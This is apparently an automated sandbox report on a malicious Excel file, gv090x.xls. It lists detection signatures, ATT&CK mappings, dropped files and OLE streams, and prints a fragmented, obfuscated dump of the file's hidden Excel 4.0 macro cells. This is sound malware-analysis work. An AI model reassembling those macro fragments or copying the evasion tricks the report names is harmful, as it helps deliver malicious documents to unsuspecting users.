Play interactive tour

Edit tour

Analysis Report gv090x.xls

Overview

General Information

Sample Name:	gv090x.xls
Analysis ID:	356769
MD5:	3ccb3ad55fdf18c9da2d3a6d3c64a1f1
SHA1:	e331cc1d0e38423264fc8f608d33980c0963cfc2
SHA256:	bbcf27717c056b3116002ea450057538f07592e9065a34e1ee61c364a6d8338d
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found abnormal large hidden Excel 4.0 Macro sheet

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document contains embedded VBA macros

Unable to load, office file is protected or invalid

Yara detected Xls With Macro 4.0

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1692 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
gv090x.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x4cb8:$e1: Enable Editing 0x4dfe:$e2: Enable Content
gv090x.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

System Summary:

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: gv090x.xls

Initial sample: Sheet size: 4709

Source: gv090x.xls

OLE indicator, VBA macros: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window title found: microsoft excel okthe workbook cannot be opened or repaired by microsoft excel because it's corrupt.

Source: gv090x.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: classification engine

Classification label: mal48.evad.winXLS@1/5@0/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\C5DE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmp

Jump to behavior

Source: gv090x.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Users\user\Desktop\gv090x.xls:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match

File source: gv090x.xls, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Path Interception	Path Interception	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Scripting11	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Hidden Files and Directories1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356769
Start date:	23.02.2021
Start time:	16:23:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gv090x.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.evad.winXLS@1/5@0/0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\15DE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	13922
Entropy (8bit):	7.264421482311856
Encrypted:	false
SSDEEP:	384:hWmKH0IZVbKyachOSbQFnzaOX4boStjOiByI6b+7Cpbtcm70n:hWmQZVbKh4OPFzUVtxD64mwn
MD5:	93E4FCE088F41BBBEA379B5F0318513C
SHA1:	7B9C43B231A71E242C09E65C222359183D501526
SHA-256:	E818F316C5B07912DE21FF20813EF05A3AA92460563A9C1862EFF88DADC91D4E
SHA-512:	E958D14F481E42C7DF181B83055CB10FB451B73D06776915D8BF068BC44122F2910E8FE681D4D0EE4BE2E9E243960BDA9111E02C38037FDE454C09D3E4CDCDE4
Malicious:	false
Reputation:	low
Preview:	..MO.0...H..W.fp@........?.K..Z.Dq....>..X..m..}^[...ec.7.T;[..'2.....J.:~.oDF....,.b.$....x.2..T.F.+%.....y..3u....0....f(.z.k...hc.[.1.....&f.%.^;.hHdw.-....Dv..A.7..#...jO.lC..v.w.&.K.j..3.....K#.].O....EZ...Th...c..ndab....[..H).dz].......Nk..E.E/......S.........Fv..Fw`"_ ....L.L.... ...k..r...K..j'7.U.......'..N...o.sp.x$.<.........X........x..^.v`i.{.2...........PK..........!.......a.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...nH....LH.!T..$.....$@.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 23:23:40 2021, atime=Tue Feb 23 23:23:40 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.476558463095134
Encrypted:	false
SSDEEP:	12:85QJ7RikLgXg/XAlCPCHaX2B8GB/YjxX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdJU:85sL/XTm6G0YefDv3qXqrNru/
MD5:	8DBAD16D3CE185637239DD2B7306B309
SHA1:	20DE769A3883F615AD99C6D40C39A37CC75337A6
SHA-256:	662AC8A55B06F2EE00D386DB045337C1113ADD1E30D49730F4E66FFFC3F20DF7
SHA-512:	27765EBD152367CEC106DA087580DCC254BE99CD5A6227143D393D83F5E0D3DB1E36D86DC312BA459B3D113D5E27ECDA3FF2E5CCDEFDEC7C2F11086B2E5BC966
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G.....LC......LC.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\gv090x.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Tue Feb 23 23:23:39 2021, atime=Tue Feb 23 23:23:40 2021, length=36864, window=hide
Category:	modified
Size (bytes):	1984
Entropy (8bit):	4.4817661661631965
Encrypted:	false
SSDEEP:	24:83rk/XTm6GreVmVeMDv3qXqdM7dD23rk/XTm6GreVmVeMDv3qXqdM7dV:8Q/XTFGqYVKaQh2Q/XTFGqYVKaQ/
MD5:	92FD3A9834599730DBAEF0FB99654045
SHA1:	26B7394B203AB0AE8EB3CAE68057F393EBB863D5
SHA-256:	4D929FAB468679E61C893EC2C33E73B397AFA8D4B9F77C0DC4DA57FB465CDC03
SHA-512:	7008347ADFFC21244DFDE3F3C1BE60487EE5C4E5655861816ED43C3DA224648B63ADA025E980EC6AD15737C4A8E304239FE5E2B7509152179828B5F31A9A070F
Malicious:	false
Reputation:	low
Preview:	L..................F.... ........{...L.LC......LC................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2.....XR.. .gv090x.xls..B.......Q.y.Q.y...8.....................g.v.0.9.0.x...x.l.s.......t...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\gv090x.xls.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.g.v.0.9.0.x...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	71
Entropy (8bit):	4.165690479495976
Encrypted:	false
SSDEEP:	3:oyBVomMzdpSaiVdpSmMzdpSv:dj6zdpeVdpEzdpc
MD5:	E1ED9A88D8B36363A9E7BBA69AE5AA4F
SHA1:	BAC0417433EE707A3F87DF6E960A9DBAA75D1C07
SHA-256:	FCF999F4FCEFEE407768E2917112D5BDF397D36BD798A991FE389FBDEB358502
SHA-512:	DA3E6EDCAB1051D76EE32047F5ED872E5673B3027761DB6FCF5E4D71E48E58F2D0ACF2AA3B3DFC1D9E56438FB5B8FD4FDD76BC3A122E0216AC21D2348E944F87
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..gv090x.LNK=0..gv090x.LNK=0..[xls]..gv090x.LNK=0..

C:\Users\user\Desktop\C5DE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	45276
Entropy (8bit):	5.099879850977744
Encrypted:	false
SSDEEP:	768:jjzi1PEYD/gM+3zdChRhohQMytjzi1pEYD/gM+s:/ziWooMZhAhQMezi0ooM9
MD5:	9B9F375BE30EDD88E7554B2DC2F9FBBB
SHA1:	00081E5FCF06279CCC848EFA692C8B529968AF4B
SHA-256:	788249CD3BC4A18E34B68A959DCF122D76F8998B9484A757F05DC7B11776E012
SHA-512:	B6F88FFA3D01BE995250FF8030B7F2E39E712C5ACD7B63CBB5C1D579BE247FE647B0488C516BE7F4354F7883D1778098032C9014AF7652C94CE1B0B9D8787B17
Malicious:	false
Reputation:	low
Preview:	........g2..........................\.p....user B.....a.........=...........................................=.......iK..8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......4...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...,...6...........A.r.i.a.l.1.......6...........A.r.i.a.l.1.......6...........A.r.i.a.l.1.......>...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......?...........A.r.i.a.l.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................A.r.i.a.l.1...................A.r.i.a.l.1...X...............A.r.i.a.l.........."$"#,##0_);$"$"#,##0$..!......"$"#,##0_);[R

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: VqDWjHteR, Last Saved By: Micha, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Feb 22 11:17:45 2021, Last Saved Time/Date: Mon Feb 22 11:19:00 2021, Security: 0
Entropy (8bit):	4.199825067166816
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	gv090x.xls
File size:	36352
MD5:	3ccb3ad55fdf18c9da2d3a6d3c64a1f1
SHA1:	e331cc1d0e38423264fc8f608d33980c0963cfc2
SHA256:	bbcf27717c056b3116002ea450057538f07592e9065a34e1ee61c364a6d8338d
SHA512:	c665db0cb7a8a91611ea1596268d1dae282e49e06be78fc76de736dafa0d7faca8ef0a6804a120728c111f9da0001e2d78d325ac59b6cba5ce0b01eb3ac5d666
SSDEEP:	384:hgC/9zi1xvqYc8YDknUgMB1WiS9ytS3hQI5SChQMy5v:pzi18EYD/gMjShR5ThQMyF
File Content Preview:	........................>.......................E...........................D..................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "gv090x.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	VqDWjHteR
Last Saved By:	Micha
Create Time:	2021-02-22 11:17:45
Last Saved Time:	2021-02-22 11:19:00
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:	gh
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.336728312671
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . s c r i p t i n g . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.290384763425
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V q D W j H t e R . . . . . . . . . . . M i c h a . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . W . . . . @ . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a4 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 6c 00 00 00 0c 00 00 00 84 00 00 00 0d 00 00 00 90 00 00 00 13 00 00 00 9c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 0c 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 26461

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	26461
Entropy:	5.15083338147
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . M i c h a B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . i K . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 4d 69 63 68 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,,,,,=GO,minu,gener,sta,assis,=WHI,disc,minu,unava,hid,solv,=WH,solve,sam,geral,cance,monro,injur,disc,gener,=NEXT,sch,=FOR,ant,=NE,=RET,nur,mem,mic,anti,int,=nu,,,,,,,,,,,,,,TO(,tes,ati,nford,tance,LE(,over,tes=,ilabl,den=L,e=0,ILE(s,=so,ple,d=COD,r=M,e=IN,ed=C,over=,ating,(),olar,MULA(,iqu,XT(),URN,se=R,orab,hel=,que,erfa,rse(,,,,,,,,,,,,,,R143C,=0,ng=0,=ROWS,=ROW,minut,"=""""",min,e=I,EN(un,xHcbSdhJXVO,olve,lve+1,s=MID,E(sa,OD(,DEX,HAR(,disco,=gene,xHcbSdhJXVO,shi,disc,e=an,xHcbSdhJXVO,(),118C,ili,R85C,=14,ces=,),,,,,,,,,,,,,,2),xHcbSdhJXVO,xHcbSdhJXVO,(me,S(m,es<s,xHcbSdhJXVO,ute,NDE,avail,,<hidd,xHcbSdhJXVO,(unav,mples,gen,(mich,MOD(g,ver&i,rati,,ps=A,"over,",tiqu,,xHcbSdhJXVO,2,a=Sh,14:R,9,2,xHcbSdhJXVO,,,,,,,,,,,,,,xHcbSdhJXVO,,,mora,ichel,tan,,s+1,X(mem,able,,en),,ail,)-3,era,"el,c",erald,nju,ng+,,DDRE,schol,e+1,,,xHcbSdhJXVO,eet1,94C14,xHcbSdhJXVO,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,bilia,),for,,xHcbSdhJXVO,ora,),,xHcbSdhJXVO,,able,2,tin,anc,-monr,red,1,,SS(,ars,xHcbSdhJXVO,,,,!R64C,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,),xHcbSdhJXVO,d),,,bilia,xHcbSdhJXVO,,,,",sol",xHcbSdhJXVO,"g,ass",er),"oe,9",xHcbSdhJXVO,xHcbSdhJXVO,,ant,hip,,,,,6:R,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,xHcbSdhJXVO,,,",minu",,,,,"ve,1",,istan,xHcbSdhJXVO,4)+3,,,,"ique,",s),,,,,79C6,,,,,,,,,,,,,,,,,,,,,,,,,,tes),,,,,),,ce)+,,2),,,,inte,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,1,,xHcbSdhJXVO,,,,rface,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,"s,,FA",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"LSE,",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""scr",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ipti,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"ng""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,